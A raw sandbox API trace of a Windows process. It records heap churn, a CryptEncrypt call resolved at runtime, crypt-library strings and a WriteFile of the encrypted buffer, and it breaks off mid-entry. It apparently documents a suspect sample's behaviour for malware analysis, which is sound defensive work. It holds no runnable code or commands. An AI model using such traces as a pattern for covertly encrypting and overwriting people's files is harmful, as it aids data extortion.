RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520d8 [0269.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0269.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0269.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52108 [0269.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520d8 | out: hHeap=0x970000) returned 1 [0269.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0269.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52108 | out: hHeap=0x970000) returned 1 [0269.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0269.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0269.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52168 [0269.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0269.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0269.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52198 [0269.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52168 | out: hHeap=0x970000) returned 1 [0269.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0269.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52198 | out: hHeap=0x970000) returned 1 [0269.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0269.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0269.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fb8 [0269.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0269.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0269.064] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fe8 [0269.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fb8 | out: hHeap=0x970000) returned 1 [0269.064] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0269.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fe8 | out: hHeap=0x970000) returned 1 [0269.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0269.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0269.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f70 | out: hHeap=0x970000) returned 1 [0269.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0269.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520a8 [0269.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0269.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0269.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52000 [0269.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520a8 | out: hHeap=0x970000) returned 1 [0269.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0269.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52000 | out: hHeap=0x970000) returned 1 [0269.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0269.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0269.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52120 [0269.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0269.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0269.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52060 [0269.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52120 | out: hHeap=0x970000) returned 1 [0269.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0269.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52060 | out: hHeap=0x970000) returned 1 [0269.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0269.065] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0269.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fa0 [0269.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0269.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0269.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52168 [0269.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fa0 | out: hHeap=0x970000) returned 1 [0269.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0269.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52168 | out: hHeap=0x970000) returned 1 [0269.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0269.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52198 [0269.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0269.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0269.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51f10 [0269.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51f10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0269.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f10 | out: hHeap=0x970000) returned 1 [0269.066] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0269.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52198 | out: hHeap=0x970000) returned 1 [0269.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0269.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54288 [0269.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0269.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0269.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0269.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0269.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0269.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0269.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0269.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0269.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0269.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0269.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0269.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0269.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0269.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0269.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0269.080] CryptEncrypt (in: hKey=0xa87490, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x978688*, pdwDataLen=0x8cef60*=0x116, dwBufLen=0x118 | out: pbData=0x978688*, pdwDataLen=0x8cef60*=0x118) returned 1 [0269.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15a18 [0269.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0269.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0269.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520d8 [0269.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52108 [0269.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f10 [0269.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0269.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f10 | out: hHeap=0x970000) returned 1 [0269.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0269.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52108 | out: hHeap=0x970000) returned 1 [0269.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520a8 [0269.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52030 [0269.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ec8 [0269.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0269.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ec8 | out: hHeap=0x970000) returned 1 [0269.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0269.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52030 | out: hHeap=0x970000) returned 1 [0269.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52108 [0269.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ec8 [0269.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fe8 [0269.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0269.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fe8 | out: hHeap=0x970000) returned 1 [0269.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0269.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ec8 | out: hHeap=0x970000) returned 1 [0269.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52030 [0269.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52198 [0269.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52120 [0269.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0269.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52120 | out: hHeap=0x970000) returned 1 [0269.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0269.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52198 | out: hHeap=0x970000) returned 1 [0269.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52060 [0269.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52168 [0269.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fe8 [0269.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0269.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fe8 | out: hHeap=0x970000) returned 1 [0269.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0269.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52168 | out: hHeap=0x970000) returned 1 [0269.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52198 [0269.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fb8 [0269.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f10 [0269.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0269.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f10 | out: hHeap=0x970000) returned 1 [0269.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0269.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fb8 | out: hHeap=0x970000) returned 1 [0269.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0269.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0269.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52078 [0269.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0269.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52120 [0269.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52090 [0269.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52000 [0269.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0269.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52000 | out: hHeap=0x970000) returned 1 [0269.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0269.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52090 | out: hHeap=0x970000) returned 1 [0269.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f40 [0269.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ee0 [0269.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f58 [0269.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0269.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f58 | out: hHeap=0x970000) returned 1 [0269.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0269.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ee0 | out: hHeap=0x970000) returned 1 [0269.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0269.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0269.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0269.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0269.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0269.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0269.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0269.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0269.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52048 | out: hHeap=0x970000) returned 1 [0269.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0269.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0269.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0269.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0269.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0269.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0269.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0269.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0269.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0269.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0269.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0269.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0269.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0269.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0269.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0269.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0269.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0269.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0269.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0269.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0269.083] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0269.084] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0269.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0269.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0269.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0269.084] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0269.084] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.085] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0269.085] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0269.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0269.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0269.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0269.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0269.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0269.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0269.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0269.085] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0269.085] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0269.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0269.085] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0269.086] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0269.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0269.086] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0269.086] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0269.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9b8 [0269.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0269.086] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0269.086] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0269.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0269.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0269.086] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0269.086] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0269.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0269.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9b8 [0269.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0269.086] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0269.086] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0269.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0269.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0269.087] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0269.087] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0269.087] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0269.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0269.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0269.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0269.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0269.087] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0269.087] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.087] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0269.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0269.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0269.087] WriteFile (in: hFile=0x2d0, lpBuffer=0x978328*, nNumberOfBytesToWrite=0x118, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x978328*, lpNumberOfBytesWritten=0x8cf5e4*=0x118, lpOverlapped=0x0) returned 1 [0269.089] PeekMessageW (in: lpMsg=0x8cf708, 